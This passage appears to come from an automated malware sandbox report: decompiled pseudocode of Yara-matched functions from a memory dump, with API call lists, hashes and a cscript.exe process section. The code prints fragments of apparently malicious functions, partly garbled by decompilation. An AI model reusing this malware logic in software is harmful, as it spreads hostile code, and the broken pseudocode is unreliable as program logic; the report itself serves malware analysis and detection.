                                                            			E00419E80(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                            0x00419e83
                                                            0x00419e86
                                                            0x00419e8f
                                                            0x00419e97
                                                            0x00419ea5
                                                            0x00419ea9

                                                            APIs
                                                            • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                            • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                            • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409A80, Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 66%
                                                            			E00409A80(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __ebx;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B800( &_v284, 0x104);
						E0041BE70( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DB0(E00414D50(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_push( &_v24);
					_push(_t52); // executed
					_t34 = E00408140(_t39); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}




















                                                            0x00409a8b
                                                            0x00409a93
                                                            0x00409a95
                                                            0x00409a9a
                                                            0x00409a9f
                                                            0x00409ab2
                                                            0x00409ab7
                                                            0x00409ac0
                                                            0x00409acc
                                                            0x00409adf
                                                            0x00409ae4
                                                            0x00409ae7
                                                            0x00409af0
                                                            0x00409b02
                                                            0x00409b07
                                                            0x00409b0c
                                                            0x00000000
                                                            0x00000000
                                                            0x00409b0e
                                                            0x00409b12
                                                            0x00000000
                                                            0x00000000
                                                            0x00409b14
                                                            0x00000000
                                                            0x00409b12
                                                            0x00409b16
                                                            0x00409b19
                                                            0x00409b1f
                                                            0x00409b21
                                                            0x00409b2c
                                                            0x00409b31
                                                            0x00409b34
                                                            0x00409b3f
                                                            0x00409b40
                                                            0x00409b41
                                                            0x00409b4c
                                                            0x00409b4e
                                                            0x00409b54
                                                            0x00409b58
                                                            0x00409b5b
                                                            0x00409b5b
                                                            0x00409b62
                                                            0x00409b65
                                                            0x00409b6a
                                                            0x00409b77
                                                            0x00409aa6
                                                            0x00409aa6
                                                            0x00409aa6

                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                                            • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
                                                            • Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                                            • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00408286, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60threadwindowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 53%
                                                            			E00408286(void* __ebx, intOrPtr* _a4) {
				void* _t10;
				void* _t11;

				asm("in al, 0x8e");
				asm("loope 0x66");
				asm("sbb [esi], ebp");
				 *((char*)(__ebx - 0x7f)) =  *((char*)(__ebx - 0x7f)) + 0x28;
				_t11 = E0041B160(_t10);
				if(_t11 == 0 || _t11 == 0x33333333) {
					return 0;
				} else {
					return  *_a4 + _t11;
				}
			}





                                                            0x00408286
                                                            0x00408288
                                                            0x0040828a
                                                            0x0040828c
                                                            0x00408298
                                                            0x0040829c
                                                            0x004082b2
                                                            0x004082a6
                                                            0x004082ae
                                                            0x004082ae

                                                            APIs
                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: (
                                                            • API String ID: 1836367815-3887548279
                                                            • Opcode ID: b784bc7f3e88494daba021be060d48e12c8f2a7faf1ca8a68c7348251b259488
                                                            • Instruction ID: 3bd0e3de3a48e026a73040ff265cd42116660e97523665222c81487ff7b89774
                                                            • Opcode Fuzzy Hash: b784bc7f3e88494daba021be060d48e12c8f2a7faf1ca8a68c7348251b259488
                                                            • Instruction Fuzzy Hash: A201FE31A403187BE720A6A58C42FFE771CAF40F04F04401DFE44BA1C1D6F9691A47EA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				void* _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t4 =  &_a16; // 0x414c6f
				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}





                                                            0x0041a037
                                                            0x0041a03c
                                                            0x0041a04d
                                                            0x0041a051

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID: oLA
                                                            • API String ID: 1279760036-3789366272
                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                            • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                            • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004082B3, Relevance: 1.6, APIs: 1, Instructions: 71threadwindowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 55%
                                                            			E004082B3(void* __ecx, void* __edi, intOrPtr _a8, long _a12) {
				char _v63;
				char _v64;
				void* _t11;
				void* _t15;
				int _t16;
				void* _t19;
				void* _t27;
				long _t28;
				int _t33;
				void* _t37;
				void* _t39;

				_t27 = __edi;
				_t23 = __ecx + 1;
				asm("outsd");
				if( *((intOrPtr*)(__ecx + 1)) < __edi) {
					if(__eflags < 0) {
						_t27 = 0x551c4722;
						_push(_t37);
						_t37 = _t39;
					}
					_push(_t30);
					_v64 = 0;
					E0041B850( &_v63, 0, 0x3f);
					E0041C3F0( &_v64, 3);
					_t15 = E0040ACC0(__eflags, _a8 + 0x1c,  &_v64); // executed
					_t16 = E00414E10(_a8 + 0x1c, _t15, 0, 0, 0xc4e7b6d6);
					_t33 = _t16;
					__eflags = _t33;
					if(_t33 != 0) {
						_push(_t27);
						_t28 = _a12;
						_t16 = PostThreadMessageW(_t28, 0x111, 0, 0); // executed
						__eflags = _t16;
						if(__eflags == 0) {
							_t16 =  *_t33(_t28, 0x8003, _t37 + (E0040A450(__eflags, 1, 8) & 0x000000ff) - 0x40, _t16);
						}
					}
					return _t16;
				} else {
					asm("invalid");
					asm("adc dword [esi+eax*2+0x5e68569d], 0xe811c6f9");
					_push(_t30);
					_t19 = E0041B290(_t11, _t23, 0x11c6f95e);
					return E0041B140(_t23) + _t19 + 0x1000;
				}
			}














                                                            0x004082b3
                                                            0x004082b3
                                                            0x004082b6
                                                            0x004082b8
                                                            0x004082ea
                                                            0x004082ec
                                                            0x004082f0
                                                            0x004082f1
                                                            0x004082f1
                                                            0x004082f6
                                                            0x004082ff
                                                            0x00408303
                                                            0x0040830e
                                                            0x0040831e
                                                            0x0040832e
                                                            0x00408333
                                                            0x00408338
                                                            0x0040833a
                                                            0x0040833c
                                                            0x0040833d
                                                            0x0040834a
                                                            0x0040834c
                                                            0x0040834e
                                                            0x0040836b
                                                            0x0040836b
                                                            0x0040836d
                                                            0x00408372
                                                            0x004082ba
                                                            0x004082ba
                                                            0x004082bc
                                                            0x004082c0
                                                            0x004082c6
                                                            0x004082dd
                                                            0x004082dd

                                                            APIs
                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID:
                                                            • API String ID: 1836367815-0
                                                            • Opcode ID: 9a6df075b3a899bbcc8e66ea9f4f4b1dfdcf750ef061f88f866bd59aa0326e67
                                                            • Instruction ID: 15bcf26793c5adb4b30de96ac94af9ddbe6e7cdc6d38737c83c8a5ad6bd04a3e
                                                            • Opcode Fuzzy Hash: 9a6df075b3a899bbcc8e66ea9f4f4b1dfdcf750ef061f88f866bd59aa0326e67
                                                            • Instruction Fuzzy Hash: 0F113B31940324BBD721A6A49C02FEE7368AF41B54F05006DFE04BB1C2E7B9A91583E9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041A231, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LookupPrivilegeValue
                                                            • String ID:
                                                            • API String ID: 3899507212-0
                                                            • Opcode ID: 56050d8244913e3bb370970d1dbd85be66a8c23741eff3f4d1711a73f959f3de
                                                            • Instruction ID: bad0358d1984c2e8f8fd26a54909ca9b9a107d454ad3037bbbf37e326c04f907
                                                            • Opcode Fuzzy Hash: 56050d8244913e3bb370970d1dbd85be66a8c23741eff3f4d1711a73f959f3de
                                                            • Instruction Fuzzy Hash: 9E1104B41052846FDB11EFB8CC91CDBBFA8EF41220B00898EF8D847202C635E965CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004082E9, Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E004082E9(void* __ecx, void* __eflags, intOrPtr _a8, long _a12) {
				char _v63;
				char _v64;
				void* _t13;
				int _t14;
				long _t23;
				int _t28;
				void* _t30;
				void* _t32;

				_t37 = __eflags;
				if(__eflags < 0) {
					_push(_t30);
					_t30 = _t32;
				}
				_v64 = 0;
				E0041B850( &_v63, 0, 0x3f);
				E0041C3F0( &_v64, 3);
				_t13 = E0040ACC0(_t37, _a8 + 0x1c,  &_v64); // executed
				_t14 = E00414E10(_a8 + 0x1c, _t13, 0, 0, 0xc4e7b6d6);
				_t28 = _t14;
				if(_t28 != 0) {
					_push(0x551c4722);
					_t23 = _a12;
					_t14 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
					_t39 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t28(_t23, 0x8003, _t30 + (E0040A450(_t39, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
				}
				return _t14;
			}











                                                            0x004082e9
                                                            0x004082ea
                                                            0x004082f0
                                                            0x004082f1
                                                            0x004082f1
                                                            0x004082ff
                                                            0x00408303
                                                            0x0040830e
                                                            0x0040831e
                                                            0x0040832e
                                                            0x00408333
                                                            0x0040833a
                                                            0x0040833c
                                                            0x0040833d
                                                            0x0040834a
                                                            0x0040834c
                                                            0x0040834e
                                                            0x0040836b
                                                            0x0040836b
                                                            0x0040836d
                                                            0x00408372

                                                            APIs
                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID:
                                                            • API String ID: 1836367815-0
                                                            • Opcode ID: e021297182014d911c4727aa76fd82cc414bc15ba45ee236aca104e310637bf7
                                                            • Instruction ID: c11f41c2e629a8b0ca5c2bb86d734e15c96e32f6bf9f39254c705a1de3a96043
                                                            • Opcode Fuzzy Hash: e021297182014d911c4727aa76fd82cc414bc15ba45ee236aca104e310637bf7
                                                            • Instruction Fuzzy Hash: CF012831A803187BE720A6A49C03FFF762C6B40F54F04401DFF04BA2C2E6A9690643EA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 82%
                                                            			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				int _t13;
				long _t20;
				int _t25;
				void* _t27;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E0041B850( &_v67, 0, 0x3f);
				E0041C3F0( &_v68, 3);
				_t12 = E0040ACC0(_t32, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t20 = _a8;
					_t13 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
					_t34 = _t13;
					if(_t13 == 0) {
						_t13 =  *_t25(_t20, 0x8003, _t27 + (E0040A450(_t34, 1, 8) & 0x000000ff) - 0x40, _t13);
					}
				}
				return _t13;
			}











                                                            0x004082f0
                                                            0x004082ff
                                                            0x00408303
                                                            0x0040830e
                                                            0x0040831e
                                                            0x0040832e
                                                            0x00408333
                                                            0x0040833a
                                                            0x0040833d
                                                            0x0040834a
                                                            0x0040834c
                                                            0x0040834e
                                                            0x0040836b
                                                            0x0040836b
                                                            0x0040836d
                                                            0x00408372

                                                            APIs
                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID:
                                                            • API String ID: 1836367815-0
                                                            • Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                                            • Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
                                                            • Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                                            • Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041A1B1, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LookupPrivilegeValue
                                                            • String ID:
                                                            • API String ID: 3899507212-0
                                                            • Opcode ID: 81e7f82f74da59e32287c8610a01331687c91399019749a179af90c6b8378f79
                                                            • Instruction ID: 6abfda86bcbcaadf275e5732025c7802f3ad21e74311e4aa4e9a40d80b62961e
                                                            • Opcode Fuzzy Hash: 81e7f82f74da59e32287c8610a01331687c91399019749a179af90c6b8378f79
                                                            • Instruction Fuzzy Hash: 28F0E5B82042952BD710DF71D844ED33FA9DF41360F14459EF8991B143C034A45ACBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                            0x0041a06f
                                                            0x0041a077
                                                            0x0041a08d
                                                            0x0041a091

                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                            • Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                            • Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LookupPrivilegeValue
                                                            • String ID:
                                                            • API String ID: 3899507212-0
                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                            • Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                            • Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041A0A0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0041A0A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                            0x0041a0a3
                                                            0x0041a0ba
                                                            0x0041a0c8

                                                            APIs
                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                            • Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
                                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                            • Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041A093, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E0041A093(intOrPtr _a4, int _a8) {
				void* _t12;

				asm("lds ebp, [edx-0x616c598e]");
				_t6 = _a4;
				E0041A950(_t12, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t6 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                            0x0041a098
                                                            0x0041a0a3
                                                            0x0041a0ba
                                                            0x0041a0c8

                                                            APIs
                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: 1fc7d20f58702dfe1a6385b027fd4cb1ef8faf4408b6f8ab23ddb250741d824d
                                                            • Instruction ID: 6ec1928867d70db06631118dd6a6670a4e80df2ae2211c676bcc51d2afbf419b
                                                            • Opcode Fuzzy Hash: 1fc7d20f58702dfe1a6385b027fd4cb1ef8faf4408b6f8ab23ddb250741d824d
                                                            • Instruction Fuzzy Hash: 27E08C753022046BD620EF54CDC9EC777689F09360F128899BA586F241D234EA00C7A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 00407AFA, Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f1669e11ad3f2db42f4edb2d1b6af7db5eb305ab2e62030786c1ba521431501a
                                                            • Instruction ID: 55eabb77780294906751bcd01b9747c7c601a56198358abbad2850f632ef602e
                                                            • Opcode Fuzzy Hash: f1669e11ad3f2db42f4edb2d1b6af7db5eb305ab2e62030786c1ba521431501a
                                                            • Instruction Fuzzy Hash: F6D01233B5817509D9369D6CE8946B4FBB5DB83624F0013ABDC84B72918957B05241C9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00417D59, Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be7af3753b33950736067c3ba3dab4c3a1ac96de5145e04d7940ba504d0c7c6f
                                                            • Instruction ID: 9801893d2f5d77c543fc2294b50c0aebf5bb5c1a5ce7f1126ec7bee5f6fadfab
                                                            • Opcode Fuzzy Hash: be7af3753b33950736067c3ba3dab4c3a1ac96de5145e04d7940ba504d0c7c6f
                                                            • Instruction Fuzzy Hash: A0D0C775B091018AC301AF5954415B1FB75E747161704229AF959D7651D321845287E9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Analysis Process: cscript.exe PID: 6944 Parent PID: 3424 cscript.exeCOMMON

                                                            Executed Functions

                                                            Function 02D69D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02D64B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D64B77,007A002E,00000000,00000060,00000000,00000000), ref: 02D69D9D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Offset: 02D50000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID: .z`
                                                            • API String ID: 823142352-1441809116
                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                            • Instruction ID: 532c06ae6389f6f56ce1ea05a37d023616f6d29bfe7cf90ee1b9a200572921f2
                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                            • Instruction Fuzzy Hash: 2AF0B2B2200208AFCB08CF88DC95EEB77ADAF8C754F158248BA1D97240C630E8118BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02D69E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtReadFile.NTDLL(02D64D32,5EB6522D,FFFFFFFF,02D649F1,?,?,02D64D32,?,02D649F1,FFFFFFFF,5EB6522D,02D64D32,?,00000000), ref: 02D69E45
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Offset: 02D50000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                            • Instruction ID: a22e9c9325102caaf3ab9b09b0af81fd63a5be95c6e71ae8f669bfde49a2479d
                                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                            • Instruction Fuzzy Hash: 5DF0A4B2200208AFCB14DF89DC95EEB77ADEF8C754F158249BA5DA7241D630E8118BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02D69F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D52D11,00002000,00003000,00000004), ref: 02D69F69
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Offset: 02D50000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                            • Instruction ID: 6fa839080f7edcdf0d029424111a29ec0f0dd878cb59f31127761a50d4840ef7
                                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                            • Instruction Fuzzy Hash: FFF015B2200208AFCB14DF89CC81EAB77ADEF88754F118149BE58A7241C630F810CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02D69E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtClose.NTDLL(02D64D10,?,?,02D64D10,00000000,FFFFFFFF), ref: 02D69EA5
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Offset: 02D50000, based on PE: false
                                                            Yara matches
                                                            Similarity
